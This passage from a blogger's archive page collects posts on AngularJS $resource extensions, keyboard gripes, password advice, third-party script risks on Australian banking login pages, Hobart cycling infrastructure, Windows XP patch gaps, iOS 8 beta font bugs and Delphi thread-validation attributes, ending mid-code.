All posts by Marc Durdin

Extending $resource in AngularJS

I’ve recently dived into the brave new world (for me) of AngularJS, for a development project for a client. I always enjoy learning new tools and frameworks, especially when there are good design principles and practices that I can apply to both the new project and filter back into existing code.

In this project, we have an existing backend that is delivering data through a RESTful JSON interface. And this is what $resource was designed for. The front end is a HTML document embedded in an existing thick-client application window. Yes, this is the real world.

The data returned by $resource can be either a single item, or an array of items — a collection. $resource automatically wraps each item in the array with the “class” of the single item, which is nice. This makes it trivial to extend items with helper functions, such as, in my case, a time conversion function for a specific field in the JSON data (pseudocode):

angular.module('appServices').factory('Widget', ['$resource',
  function($resource) {
    var Widget= $resource('/data/widgets/:widgetId.json', {}, {
      query: {method:'GET', params:{widgetId:''}, isArray:true}
    });

    Widget.prototype.createTimeInMinutes = function() {
      var m = moment(this.createDateTime);
      return m.hours()*60 + m.minutes();
    };
    
...

However, finding a way to extend the collection was also of interest to me. For example, to add an itemById function which would return a single item from the array identified by a unique identifier field. This is of course me applying my existing object-oriented brain to a Angular (FWIW, this post was the best intro to Angular that I have found, even though it’s about coming from jQuery and not from an OO world).

It seemed nice to me to be able to write something like collection.itemById(), or item.createTimeInMinutes(), associating these functions with the data that they manipulate. Object orientation doing what it does best.  While I was aware of advice around the dangers of extending built-in object prototypes — monkey-patching, I really wasn’t sure that the same concerns applied to extending an ‘instance’ of Array.

There were several answers on Stack Overflow that related to this, in some way, and helped me think through the problem. I (and others) came up with several possible solutions, none of which were completely beautiful to me:

  1. Extend the array returned from $resource.  This is actually hard to do, but in theory possible with transformResponse. Unfortunately, because AngularJS does not preserve extensions to Array objects, you lose those extensions very easily. I won’t add the code here because it is ultimately unhelpful.
  2. Wrap the array in a helper object, when loading in the controller:
    Resource.query().$promise.then(function(collection) {
      $scope.collection = new CollectionWrapper(collection);
    });

    This worked, again, but added a layer of muck to every collection which was unpalatable to me, and pushed implementation into the controller, which just felt like the wrong plce.

  3. Add a helper object:
    var CollectionHelper = {
      itemById = function(collection, id) {
        ...
      }
    };
    
    ...
    
    var item = CollectionHelper.itemById(collection, id);

    Again, this didn’t feel clean, or quite right, although it worked well enough.

  4. Finally, James suggested using a filter.
    angular.module('myapp').filter('byId', function() {
        return function(collection, id) {
          ...
        }
      });
    
    ...
    
    var item = $filter('byId')(collection, id);
    // or you can go directly if injected:
    var item = byIdFilter(collection,id);
    // and within the template you can use:
    {{collection | byId:id }}
    

This last is certainly the most Angular way of doing it.  I’m still not 100% satisfied, because filters have global scope, which means that we need to give them ugly names like collectionDoWonk, instead of just doWonk.

Is this the best way to skin this cat?

Cursor Keys Have Not Improved

I’m a keyboard guy. And I think keyboards suck. In fact, I wrote about this before

I found two new ugly specimens for today’s little rant, and your perusal. Both these keyboards have a reasonably traditional layout, but both fail, for different reasons. These two keyboards were in our conference room.

Microsoft Wireless 800

What’s wrong with this?

  1. It has no gaps between the different parts of the keyboard. Muscle memory fail.
  2. It has a bizarre scooped out shape, not really visible in the photo, which seems to encourage pressing the wrong row of keys.
  3. It has no gaps. This is so bad that it bears repeating. Without gaps, you have to look for the key because you can’t feel for it. Every time.

I thought I was the only one who really hated this keyboard with a passion, but enough other people complained about it that we replaced it with a Dell keyboard. I don’t know what has happened to the Microsoft keyboard. It’s entirely possible someone burned it.

Dell Latest

So this one, at first glance, improves on the Microsoft keyboard by reintroducing that classic design feature: white space, or black space. Just space. Y’know, gaps between different parts of the keyboard. Space is not entirely at a premium on our conference room table. But:

  1. The keys are modern funky flat keys with an unsatisfying deadness to them.
  2. The wrong size! Little tiny navigation keys for big fingers.
  3. And the media keys are encroaching on the navigation key space.
  4. What is the Clear key for? And what have you done with Num Lock? And Scroll Lock? And Pause/Break?
  5. I have nothing against the moon, but why do we need a moon key on our keyboard?

These things cost us time and productivity. It may seem minor, but moving between keyboards has become a constant frustration. I wish we as an industry could do better.

Everything you (thought you) knew about Internet password security is wrong

Time and time again, we see calls from security experts for complex passwords.   Make sure your password includes lower case letters, upper case letters (how xenoglossophobic!), numerals, punctuation, star signs, and emoji.  It must be no less than 23 characters long and not use the same character twice.  Change your password every 60 days, every 30 days, every half hour.  Don’t use the same password again this year, or next year, or for the next 6 galactic years.  Never write your password down.  Especially not on a post-it on your monitor.  Or under your keyboard.
d00fus

The Golden Password Rules

And it’s all wrong.  There are just two rules you need to remember, as an Internet password user:

  1. Never use the same password in two places.  Like, if you have a Yahoo account and a Google account, don’t let them share the same password.  They’d be offended if they knew you did anyway.
  2. Make sure your password isn’t “guessable”, like your pet’s name, or your middle name.  Or anyone’s middle name.  Or “password”.  Or anything like that.  But “correct horse battery staple” is probably ok, or it was until xkcd published that cartoon.

It’s all wrong because all that complexity jazz is just part of an arms race in the brute force or dictionary attack password cracking game.

Say what? So a brute force attack is, in its simplest form, a computer — or hundreds of computers — trying everything single password combination they can think of, against your puny little password. And trust me when I say a computer can think of more passwords than you can. Have you ever played Scrabble against a computer?

Brute force attacks on Internet passwords are only effective on well designed sites when that site has already been compromised.  At which point who cares if they know your password to that site (because rule 1, remember): they also know everything else that site has recorded about you.  And anyway you can just change that password.  No problem (for you; the site owners have a big problem).

Now, if you are unlucky enough to be targeted, then complex passwords are not going to save you, because the attackers will find another way to get your data without needing to brute force your Google Apps password.  We’ve seen this demonstrated time and time again.  And if you are not being targeted, then you can only be a victim of random, drive-by style password attacks.  And if you followed rule 2, then random, drive-by style password attacks still won’t get you, because the site owner has followed basic security principles to prevent this.  And if the site owner has not followed basic security principles, then you are stuffed anyway, and password complexity still doesn’t matter.

In fact, complex passwords and cycling regimes actually hurt password security.  The first thing that happens is that users, forced to change passwords regularly, can no longer remember any passwords.  So they start to use easier to guess passwords.  And eventually, their passwords all end up being some variation of “password123!”.

The Bearers of Responsibility

The people who really have to do the hard yards are the security experts, software developers, and the site owners.  They are the keepers of the password databases and bear a heavy burden for the rest of us.  Some suggestions, by no means comprehensive, for this to-be-pitied crew:

  1. Thwart dictionary attacks on Internet-facing password entry.  That is, throttle connection attempts, delay for 15 seconds after 10 attempts, require 2nd level authentication after failed attempts, that kind of thing.  These solutions are well documented.
  2. Control access to your password database (duh).  Remember, in the good ol’ days of Unix, password were stored in /etc/passwd, which was world readable and so the enterprising young hacker could just copy the file and try and crack it in their own good time elsewhere.  So keep other people’s dirty paws off your (hashed) password database.
  3. Don’t ever display passwords in plain text.  No “here is your password” emails.  Not even for registration.  That has to be a one time token.  Your password database is hashed, right?  Not ROT13?
  4. Notify a user if someone tries to access their account multiple times.  Give them the power to fret and stress.
  5. If your site gets hacked, tell your users as soon as you possibly can, and reset your password database.  Mind you, they’ll just have to change their password for your site because they’ve been following rule 1 above, right?  Oh, and don’t be too ashamed to tell anyone.  It happens to all the best site owners and there’s nothing worse than covering it up.

The Flaw in My Rant

Still, my rant has a problem.  It’s to do with Rule 1:  A separate password for every site.  But just how many sites do I have accounts for?  Right now?  402 sites.

Yikes.

How do I manage that?  How can I remember passwords for 402 sites?  I can’t!  So I put them into a database, of course.  Managed by a password app such as KeePass or 1Password or Password Safe. Ironically, as soon as I use a password manager, I no longer have to make up passwords, and they actually end up being random strings of letters, numbers and symbols. Which keeps those old-fashioned password nazis happy too.

Personally, I keep a few high-value passwords out of the password database (think Internet Banking) and memorise them instead.

Of course, my password safe itself has just a single password to be cracked.  And because I (the naive end user) store this database on my computer, it’s probably easy enough to steal once I click on that dodgy link on that site…  At which point, our black hat password cracker can roll out their full armada of brute force password cracking flying robots to get into my password database.  So perhaps you still need that complex password to secure your password database?

What do you think?

Note: Roger Grimes stole my thunder.

Risks with third party scripts on Internet Banking sites

This morning, Firefox stalled while loading the login page for the ANZ Internet Banking website. Looking at the status bar, I could see that Firefox was attempting to connect to a website, australianewzealandb.tt.omtrdc.net. This raised immediate alarm bells, because I didn’t recognise the website address, and it certainly wasn’t an official anz.com sub-domain.

ANZ login delay - note the status message at the bottom of the window
ANZ login delay – note the status message at the bottom of the window

The connection eventually started, and the page finished loading — just one of those little glitches loading web pages that everyone encounters all the time, right? But before I entered my ID and password, I decided I wasn’t comfortable to continue without knowing what that website was, and what resources it was providing to the ANZ site.

And here’s where things got a little scary.

It turns out that australianewzealandb.tt.omtrdc.net is a user tracking web site run by marketing firm Omniture, now a part of Adobe.  The ANZ Internet Banking login page is requesting a Javascript script from the server, which currently returns the following tiny piece of code:

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferDefault()).loaded();}

The Scare Factor

This script is run within the context of the Internet Banking login page. What can scripts that run within that context do? At worst, a script can be used to watch your login and password and send them (pretty silently) to a malicious host. This interaction may even be undetectable by the bank, and it would be up to you and your computer to be aware of this and block it — a big ask!

At worst, a script can be used to watch your login and password and send them to a malicious host.

The Relief

Now, this particular script is fortunately not malicious! In fact, as the mboxFactories variable actually is undefined on this page, this script does nothing at all. In other words, it’s useless and doesn’t even need to be there!  (It’s defintely possible that the request for the script is being used on the server side to log client statistics, given the comprehensive parameters that are passed in the HTTPS request for the script.)

What are the risks?

So what’s the big deal with running third party script on a website?

The core issue is that scripts from third party sites can be changed at any time, without the knowledge of the ANZ Internet Banking team. In fact, different scripts can be served for different clients — a smart hacker would serve the original script for IP addresses owned by ANZ Bank, and serve a malicious script only to specific targeted clients. There would be no reliable way for the ANZ Internet Banking security team to detect this.

Scripts from third party sites can be changed at any time, without the knowledge of the Internet Banking team.

Another way of looking at this: it’s standard practice in software development to include code developed by other organisations in applications or websites. This is normal, sensible, and in fact unavoidable. The key here is that any code must be vetted and validated by a security team before deployment. If the bank hosts this code on their own servers, this is a straightforward part of the deployment process. When the bank instead references a third party site, this crucial security step is impossible.

Banking websites are among the most targeted sites online, for obvious reasons. I would expect their security policies to be conservative and robust. My research today surprised me.

Trust

How could third party scripts go wrong?

First, australianewzealandb.tt.omtrdc.net is not controlled by ANZ Bank.  It’s controlled by a marketing organisation in another country.  We don’t know how much emphasis they place on security. We are required to trust a third party from another country in order to login to our Internet Banking.

This means we need to trust that none of their employees are malicious, that they have strong procedures in place for managing updates to the site, the servers and infastructure, and that their organisation’s aims are coincident with the tight security requirements of Internet Banking. They need to have the same commitment to security that you would expect your bank to have. That’s a big ask for a marketing firm.

Security

The ANZ Internet Banking website is of course encrypted, served via HTTPS, the industry standard method of serving encrypted web pages.

We can tell, just by looking at the address bar, that anz.com uses an Extended Validation certificate.

With a little simple detective work, we can also see that anz.com serves those pages using the TLS_RSA_WITH_AES_256_CBC_SHA encryption suite, using 256-bit keys.  This is a good strong level of encryption, today.

However, australianewzealandb.tt.omtrdc.net does not measure up. In fact, this site uses 128-bit RC4+SHA encryption and integrity and does not have an Extended Validation certificate. RC4 is not a good choice today, and neither is SHA. This suggests immediately that security is not their top concern, which should then be an immediate concern to us!

ANZ vs Omtrdc Security
ANZ vs Omtrdc Security

I should qualify this a little: Extended Validation certificates are not available for wildcard domains, which is the type of certificate that tt.omtrdc.net is using. This is for a good reason: “in order to ensure that EV SSL Certificates are not issued fraudulently or misused after issuance.” It’s worth thinking through that reason and seeing how it applies to this context.

Malicious Actors

So how could a nasty person steal your money?

In theory, if a nasty person managed to hack into the Adobe server, they could simply supply a script to the Internet Banking login page that captures your login details and sends them to a server, somewhere, anywhere, on the Internet. This means that we have to trust (there’s that word again) that the marketing firm will be proactive in updating and patching not only their Internet-facing servers, but their infrastructure behind those servers as well.

If a bad actor has compromised a certificate authority, as has happened several times recently, they can target these third party servers . Together with a DNS cache poisoning or Man-In-The-Middle (MITM) attack, even security-savvy users will be unlikely to notice fraudulent certificates on the script servers.

heartbleedSecurity flaws like Heartbleed are exacerbated by this setup. Not only do the bank security team have to patch their own servers, they also have to push the third party vendors to patch theirs as a priority.

Protect Yourself

As a user, run security software. That’s an important first step. Security software is regularly refreshed with blacklists of known malicious sites, and this will hopefully minimize any window of opportunity that an untargeted attack may have. I’m not going to recommend any particular brand, because I pretty much hate them all.

If you want to unleash your inner geek and be aware of how sites are using third party script servers, you can use Developer Tools included in your browser — press F12 in Internet Explorer, Chrome or Firefox, and look for the Network tab to see a list of all resources referenced by the site. You may need to press Ctrl+F5 to trigger a ‘hard’ refresh before the list is fully populated.

I’ve shown below the list of resources, filtered for Javascript, for the National Australia Bank Internet Banking site.  You can see two scripts are loaded from one site — again, a market research firm.

nab-resources

Simplistic Advice for Banks

Specifically to mitigate this risk, banks should consider the following:

  • Serve all scripts from your own domain and vet any third party scripts that you serve before deployment.
  • In particular, check third party scripts for back end communication, via AJAX or other channels.
  • Minimize the number of third party scripts anywhere that secure content must be presented.
  • Use the Content-Security-Policy HTTP header to prevent third party scripts on supported browsers (most browsers today support this).

There are of course other mitigations, such as Two Factor Authentication (2FA), which do reduce risk. However, even 2FA should not be considered a silver bullet: it is certainly possible to modify the login page to take over your current login in real time — all the user would see is a message that they’d mistyped their password, and as they login again, the malicious hacker is actively draining money from their account.

A final thought on 2FA: do you really want a hacker to have your banking password, even if they don’t have access to your phone? Why do we have these passwords in the first place?

Browser Developers

I believe that browser vendors could mitigate the situation somewhat by warning users if secure sites reference third party sites for resources, in particular where these secure sites have lower quality protection than the first party site. This protection is already in place where content is requested over HTTP from a HTTPS site, known as mixed content warnings.

There is no value in an Extended Validation certificate if any of the resources requested by the site are served from a site with lower quality encryption! Similarly, if a bank believes that 256-bit AES encryption is needed for their banking website, a browser could easily warn the user that resources are being served with lower quality 128-bit RC4 encryption.

Australian Banks

After this little investigation, I took a quick look at the big four Australian banking sites — ANZ, Commonwealth Bank, National Australia Bank, and Westpac.  Here’s what I found; this is a very high-level overview and contains only information provided by any web browser!

Bank Bank site security # 3rd party scripts Third party sites Third party security
ANZ Bank 256-bit AES (EV certificate) 1 australianewzealandb.tt.omtrdc.net 128-bit RC4
NAB 256-bit AES (EV certificate) 2 survey.112.2o7.net 256-bit AES
Westpac 128-bit AES (EV certificate) None!
Commonwealth Bank 128-bit AES (EV certificate) 9! ssl.google-analytics.com 128-bit AES
commonwealthbankofau.tt.omtrdc.net 128-bit RC4
google-analytics.com 128-bit AES
d1wscoizcbxzhp.cloudfront.net 128-bit AES
cba.demdex.net 128-bit AES

Do you see how the *.tt.omtrdc.net subdomains are used by two different banking sites? In fact, this domain is used by a large number of banking websites. That would make it an attractive target, wouldn’t you think?

I reached out to all 4 banks via Twitter (yeah, I know, I know, “reached out”, “Twitter”, I apologise already), and NAB was the first, and so far only, bank to respond:

Kudos are due to NAB and Westpac — NAB for responding so promptly, and Westpac, for not having the issue in the first place!

Updates (6:10am, 9 Sep 2014), with thanks, in no particular order:

Many thanks to Troy Hunt for suggesting I write this, then tweeting it — and for his continual and tireless work in websec!

Stefano Di Paola mentioned a previous Omniture vulnerability and referenced 3rd party script risks in his blog:

hillbrad⚡ mentioned a W3C project to make validation of sub-resource integrity possible:

Erlend Oftedal reminded me that this is not a new issue and mentioned his blog post from 2009:

Nearly crushed by a cement truck on my ride today

Update 2 July 2014: Added two diagrams to mitigation of Boral Concrete Forecourt

An unfolding story

So, I was nearly crushed by a cement truck today.  It came around a corner, at about 40km/h, without indicating.  I was doing just 25km/h on my bike, which was fortunate, as otherwise I probably would be writing this from a hospital bed, or from a comfy freezer down at the neighbourhood morgue (do they have wifi?).

Perhaps he’d stepped in some cement during his delivery run, and found it hard to ease off the accelerator pedal.  Whatever the case, I don’t want to lay all the blame for this near miss at the feet of the driver.

That’s because the real problem lies with the Hobart City Council. This incident occurred on the primary, and best cycling route North out of the city.  The HCC maps describe this route as a “Off-road – Shared Footway/Bicycle Path.”  I think I will now describe it as an “Off-road – Shared Footway/Bicycle/Cement Truck Path.”

The site in question is the Boral Concrete Depot, through which the cycle route happily wends its way, and is probably the most dangerous of the obstacles which the intrepide commuter cyclist must negotiate on his or her way out of Hobart City.  But it is by no means the only obstacle.

An interview

Before I go into more detail on the obstacles, with pictures and lots of fun, I have taken down an Official Report from myself, viz.:

I was proceeding on my pedal cycle in a Northerly direction, at approximately twenty-five (25) kilometres per hour, through the Forecourt of the Boral Concrete Depot, upon the principal cycle route as shown on Council Maps, and paying due attention to traffic on the adjacent Highway, when my attention was caught by an approaching Cement Mixer Truck (henceforth, CMT).  Said CMT was proceeding in a Southerly direction at a speed which I estimate at no less than forty (40) kilometres per hour, and as CMT had not indicated that it would be leaving the aforementioned Highway, I presumed that it would continue past the entrance into the forecourt.

To my surprise, when the CMT reached the entrance of the Forecourt, it abruptly swung off the Highway and into the Forecourt, at speed, at which point I executed Evasive Manœuvres, to wit, braking sharply and turning my vehicle (2 wheeled pedal cycle) towards the West.  Additionally, I immediately alerted the driver of CMT to the impending danger with a carefully worded, shouted, phrase.

CMT then braked heavily; however this action was no longer necessary as I had already averted the danger with my Evasive Manœuvres.  I then proceeded, unharmed, on my journey, albeit with an elevated heart rate (see Figure 1 – ed).

Heart Rate and Speed
Figure 1 – Heart Rate and Speed
Incident Diagram
Figure 2 – Incident Diagram

Your daily obstacle course commute

The Intercity Cycleway is by far the most established and concrete (there’s that word again) piece of bicycle infrastructure in Hobart. Following the railway line North from the Docks, through Moonah, Glenorchy and Montrose, it is used by hundreds (in Summer, thousands) of cyclists a day for commuting and exercise. And until you reach the Cenotaph, it is, by and large, a decent piece of cycle infrastructure.

The bliss of the Intercity Cycleway
The bliss of the Intercity Cycleway

I think a good question to ask when looking at bicycle infrastructure design is: is it safe for an 8 year old to ride? Not necessarily unaccompanied, but looking more at bicycle control and potential danger points. And at the Cenotaph, things start to go downhill. First, we encounter a confusing road crossing, up-hill, with traffic approaching from 4 different directions. The confusion is mitigated by typically low speeds, but it’s not a good start.

Traffic comes from four different directions as you exit the Intercity Cycleway
Traffic comes from four different directions as you exit the Intercity Cycleway

After crossing the road, a cyclist is presented with two possible routes. The official route heads slightly up hill, and a secondary route heads past the Cenotaph. All well and good, almost.

Approaching the Cenotaph - Two Routes
Approaching the Cenotaph – Two Routes

The “almost” comes into play shortly. The official route turns abruptly at the edge of the highway, where traffic is passing at 70km/h. There is no safety barrier.

Approach the Highway, and Turn Left
Approach the Highway, and Turn Left

Here the path goes downhill, literally. The typical cyclist picks up a bit of speed here, coasting down the hill. We reach the other end of the Cenotaph route.

This point is just plain dangerous, which is no doubt why the newer, ‘official’ route was introduced. However, without signage or recommendation, there is nothing to encourage riders to use the slightly less dangerous, slightly longer route. So what’s the problem?

Mind you don't miss the corner!
Mind you don’t miss the corner!
  1. There is a conflict point with cyclists merging, at speed, coming down hill both on the official route, and the Cenotaph route. This can be a conflict with pedestrians as well.
  2. Worse, cyclists coming down the Cenotaph route run a significant risk of overshooting, if not careful, into the highway. I have seen a cyclist do this. They were lucky: no cars were in the near lane.

Now we approach the bottom of the hill, with a blind corner. Pedestrians regularly round this corner on the “wrong” side of the shared path. Cyclists should ride their brakes down here to avoid picking up too much speed.

Approaching Boral Concrete
Approaching Boral Concrete

Confusion ensues: there are three marked routes here. Which is the proper route? The only frequently used route is the closest exit onto the forecourt roadway. But this exit is also the most dangerous, as I found today. The two more distant exits are just awkward to access. This forecourt is dangerous: with traffic entering from the highway, potentially at speed, and trucks turning and reversing, it’s just not a great place for bikes. Yet it is smack bang on the primary bike route into Hobart.

The iPhone does a Telephoto Spy Shot into Boral Concrete's Depot
The iPhone does a Telephoto Spy Shot into Boral Concrete’s Depot
The Forecourt, Heading North
The Forecourt, Heading North
Yes, Ride Past the No Entry Sign
Yes, Ride Past the No Entry Sign to exit South
The Route North to the Intercity Cycleway in all its glory
The Route North to the Intercity Cycleway in all its glory
One of the three off ramps into the forecourt
One of the three off ramps into the forecourt

Things improve a little on the far side: we have a reasonably well marked pathway, albeit with another sharp corner right on the edge of the highway.

Turn Hard Left.  This does not qualify as high quality infrastructure, sorry!
Turn Hard Left. This does not qualify as high quality infrastructure, sorry!

Now we are faced with a traffic light pole in the middle of the path, narrowing the path in one direction to less than a metre right beside a very busy roadway. That’s nasty.

The Pole
The Pole

The next section, however, is quite pleasant, offset from the road and through an avenue of trees. Apart from some minor maintenance on the ‘cobblestones’ to level them out, I have no complaints.

Pleasant Times
Pleasant Times

Now we come to the Hobart Docks precinct. First we have a road crossing, with a separate light for and control system for bicycles. I’m not sure why. The button is on the wrong side of the path, causing conflict for oncoming bicycles.

Road crossing
Road crossing

Enough has been said about the placement of this Cafe. But perhaps the signs which frequently encroach into the bike lane (not too badly in the photo today, but worse on other days) should be relocated.

The Cafe
The Cafe
A Sign Encroaches
A Sign Encroaches

Crossing the docks themselves is not ideal, with a path shared with pedestrians and parking cars. But it is a low speed area and most of the conflicts are overcome without too much trouble. However, the Mures carpark entrance is still dangerous, even with the upgraded crossing treatment. Sight lines are poor and I have observed drivers crossing this intersection at speed, attempting to make it into a break in the traffic on Davey St.

Crossing the Mures Entrance
Crossing the Mures Entrance

Finally, we have another shared path, with a somewhat ambiguously marked bike lane on the street side of it. Perhaps it would be better to treat the whole path as shared, and not ‘reserve’ a section for bikes if it isn’t going to be clearly marked, but it’s not a big issue.

Shared Path Past Docks
Shared Path Past Docks

Mitigations

The sections of the track that need attention most urgently are those along the edge of the highway, and where the route crosses the Boral Concrete forecourt area.

Engineers Australia Building

Travelling from the city this time, the first danger point, where the path traverses the edge of the highway and narrows around the traffic light pole, could be improved by shifting the bike path away from the edge of the road, and across the otherwise empty lawns outside the Engineers Australia building. No doubt there are some property boundary issues there. But perhaps it wouldn’t hurt to ask them? Even a one or two metre setback would improve the situation considerably.

Adjusting the shared path past the Engineers Australia building
Adjusting the shared path past the Engineers Australia building

Boral Concrete Forecourt

The safest solution to this area would be to close the car and truck access to and from the highway entirely, and reroute traffic to Boral Concrete and the Engineers Australia building through the dockyards. This would also address the problematic entrance of vehicles onto the highway in the middle of a major intersection.

Alternative access to Boral Concrete
Alternative access to Boral Concrete
Close highway access to forecourt
Close highway access to forecourt

This may be a hard sell, however if the Hobart City Council wants to increase the bike share into the city, it will need to take serious steps to improve the safety of this primary route through this area.

Realignment of path past Cenotaph

The bike path along the side of the highway could be rerouted behind the Cenotaph, or with some work, shifted away from the edge of the highway. Alternatively, a safety barrier could be put into place along the path beside the highway.

Alternate Cenotaph Routes: both would take some work
Alternate Cenotaph Routes: both would take some work

I’ve been wanting to write this post for quite a while. The Incident of the Cement Truck was sufficient to rekindle my blogging ‘abilities’. Other posts in the Hobart Bike Infrastructure series:

Fifty-nine vulnerabilities, or do you feel safe using Windows XP?

In today’s Microsoft Security Bulletin release was a very long list of vulnerabilities fixed in Internet Explorer. A very long list. 59 separate vulnerabilities to be exact. I do believe that is a record.

But I’m not here to talk about the record — I am more interested in the steps Windows XP users will take to mitigate the flaws, because Microsoft are not patching any of these vulnerabilities for Windows XP! Some people I’ve talked to, from individuals up to enterprises, seem to have the idea that they’ll practice “Safe Computing” and be able to continue using Windows XP and avoid paying for an upgrade.

What do I mean by Safe Computing? Y’know, don’t open strange attachments, use an alternate web browser, view emails with images switched off, keep antivirus and malware protection software up to date, remove unused applications, disable unwanted features, firewalls, mail and web proxies, so on and so forth.

So let’s look at what the repercussions are of practicing Safe Computing in light of these disclosures.

The first mitigation you are going to take is, obviously, to stop using Internet Explorer. With this many holes, you are clearly not going to be able to use Internet Explorer at all. This means a loss of functionality, though: those Internet Explorer-optimised sites (I’m looking at you, just about every corporate intranet) often don’t even work with non-IE browsers. So if you have to use IE to view these ‘trusted’ sites, you must ensure you never click on an external link, or you will be exposed again. Doable, but certainly a hassle.

Okay, so you don’t use IE now. You use Firefox, or Chrome. But you’re still in trouble, because it turns out that the very next security bulletin announces that GDI+ and Uniscribe are both vulnerable as well, today. GDI+ is used to display images and render graphics in Windows, and Uniscribe is used by just about every application to draw text onto the screen, including all the major web browsers. The Uniscribe flaw relates to how it processes fonts. The GDI+ flaw relates to a specific metafile image format.

So, disable support for downloadable fonts in your browser, and disable those specific metafile image types in the Windows Registry. Yes, it can be done. Now you’ll be all good, right? You don’t need those fonts, or those rare image types, do you? You can still surf the web okay?

But you’ve lost functionality, which we might not value all that highly, but it’s still a trade-off you’ve had to make.

From today, every security flaw that is announced will force you to trade more functionality for security.

And this is my point. From today, and on into the future, every security flaw that is announced will force you to trade yet more functionality for security. Eventually, you will only be able to use Windows XP offline — it simply will not be possible to safely access Internet resources without your computer and your data being compromised. It’s going to get worse from here, folks. It is well and truly past time to upgrade.

Only 21? Do you feel safe yet?

iOS 8 beta 1 — first bug reports

Like every other iOS developer, I have already downloaded and installed XCode 6 and the first beta 8.0 of iOS onto one of my test iDevices. And, like every other IOS developer, I immediately went to go and test one of my apps on the new build. And, unfortunately, as can be expected with a beta, I found a bug. I have dutifully filed a bug report via Apple’s bugreport.apple.com!

Given that bug reports are private, I have opted to make information public here because I have had many, many of my product users ask me about it: the bug first arose with iOS 7.1 and I had hoped that it had been addressed in 8.0. Most of my users are not technical enough to be able to navigate the bugreport.apple.com interface, so their only recourse is to complain to us!

Bug #1: Custom font profiles fail to register and work correctly after device restart

We have developed a number of custom font profiles for various languages, following the documentation on creating font profiles for iOS 7+ at https://developer.apple.com/library/ios/featuredarticles/iPhoneConfigurationProfileRef/iPhoneConfigurationProfileRef.pdf. Each of these profiles exhibits the same problem: after the font profile is installed, the specific language text usually displays in all apps, including Notes, Mail and more. However, as soon as the device is restarted, the font fails to display in any apps. In some cases, residual display of the font continues after the restart, but any edit to the text causes the display to revert to .notdef glyphs or similar.

Amharic text -- square boxes
Amharic text before the font profile is installed — square boxes
Amharic-Text-Notes-Success
Amharic text after the font profile is installed: now readable.  But not for long.

Even before the device is restarted, font display is sometimes inconsistent. For example, if you shutdown mail and restart it, fonts will sometimes display correctly and sometimes incorrectly.

The samples given are using the language Amharic.  The font profile can be installed through my Keyman app, available at http://keyman.com/iphone.

A sample of text in Amharic is ጤና ይስጥልን (U+1324 U+1293 U+0020 U+12ED U+1235 U+1325 U+120D U+1295).  This text displays correctly when the font profile is first installed, in some situations, and always displayed correctly in iOS 7.0.   The issue first arose in iOS 7.1 and has continued into the iOS 8.0 beta.

References:

Bug #2: Touches on fixed elements in Safari are offset vertically

In Safari in iOS 8.0 beta 1, I have found that touching fixed elements often results in a touch which is 200-odd pixels north of the actual location I touch.  No doubt plenty of people will report this one!

Using Delphi attributes to unify source, test and documentation

Updated 28 May 2014: Removed extraneous unit reference from AttributeValidation.pas. Sorry…

What problem was I trying to solve?

Recently, while using the Indy Internet components in Delphi XE2, I was struggling to track the thread contexts in which certain code paths ran, to ensure that resource contention and deadlocks were correctly catered for.

Indy components are reasonably robust, but use a multithreaded model which it turns out is difficult to get 100% correct.  Component callbacks can occur on many different threads:

  • The thread that constructed the component
  • The VCL thread
  • The server listener thread
  • The connection’s thread
  • Some, e.g. exceptions, can occur on any thread

Disentangling this, especially when in conjunction with third party solutions that are based on Indy and may add several layers of indirection, quickly becomes an unenjoyable task.

I started adding thread validation assertions to each function to ensure that I was (a) understanding which thread context the function was actually running in, and (b) to ensure that I didn’t call the function in the wrong context myself.  However, when browsing the code, it was still very difficult to get a big picture view of thread usage.

Introducing attributes

Enter attributes.  Delphi 2010 introduced support for attributes in Win32, and a nice API to query them with extended Run Time Type Information (RTTI).  This is nice, except for one thing: it’s difficult at runtime to find the RTTI associated with the current method.

In this unit, I have tried to tick a number of boxes:

  • Create a simple framework for extending runtime testing of classes with attributes
  • Use attributes to annotate methods, in this case about thread safety, to optimise self-documentation
  • Keep a single, consistent function call in each member method, to test any attributes associated with that method.
  • Sensible preprocessor use to enable and disable both the testing and full RTTI in one place.

One gotcha is that by default, RTTI for Delphi methods is only available for public and published member methods.  This can be changed with the $RTTI compiler directive but you have to remember to do it in each unit!  I have used a unit-based $I include in order to push the correct RTTI settings consistently.

I’ve made use of Delphi’s class helper model to give direct access to any object at compile time.  This is a clean way of injecting this support into all classes which are touched by the RTTI, but does create larger executables.  I believe this to be a worthwhile tradeoff.

Example code

The code sample below demonstrates how to use the attribute tests in a multi-threaded context. In this example, an assertion will be raised soon after cmdDoSomeHardWorkClick is called. Why is this? It happens because the HardWorkCallback function on the main thread is annotated with [MainThread] attribute, but it will be called from TSomeThread‘s thread context, not the main thread.

In order for the program run without an assertion, you could change the annotation of HardWorkCallback to [NotMainThread]. Making this serves as an immediate prompt that you should not be accessing VCL properties, because you are no longer running on the main thread. In fact, unless you can prove that the lifetime of the form will exceed that of TSomeThread, you shouldn’t even be referring to the form. The HardWorkCallback function here violates these principles by referring to the Handle property of TForm. However, because we can show that the form is destroyed after the thread exits, it’s safe to make the callback to the TAttrValForm object itself.

You can download the full source for this project from the link at the bottom of this post in order to compile it and run it yourself.

Exercise: How could you restructure this to make HardWorkCallback thread-safe? There’s more than one way to skin this cat.

unit AttrValSample;

interface

uses
  System.Classes,
  System.SyncObjs,
  System.SysUtils,
  System.Variants,
  Vcl.Controls,
  Vcl.Dialogs,
  Vcl.Forms,
  Vcl.Graphics,
  Vcl.StdCtrls,
  Winapi.Messages,
  Winapi.Windows,

  {$I AttributeValidation.inc};

type
  TSomeThread = class;

  TAttrValForm = class(TForm)
    cmdStartThread: TButton;
    cmdDoSomeHardWork: TButton;
    cmdStopThread: TButton;
    procedure cmdStartThreadClick(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure cmdStopThreadClick(Sender: TObject);
    procedure cmdDoSomeHardWorkClick(Sender: TObject);
  private
    FThread: TSomeThread;
  public
    [MainThread] procedure HardWorkCallback;
  end;

  TSomeThread = class(TThread)
  private
    FOwner: TAttrValForm;
    FEvent: TEvent;
    [NotMainThread] procedure HardWork;
  protected
    [NotMainThread] procedure Execute; override;
  public
    [MainThread] constructor Create(AOwner: TAttrValForm);
    [MainThread] destructor Destroy; override;
    [MainThread] procedure DoSomeHardWork;
  end;

var
  AttrValForm: TAttrValForm;

implementation

{$R *.dfm}

procedure TAttrValForm.cmdStartThreadClick(Sender: TObject);
begin
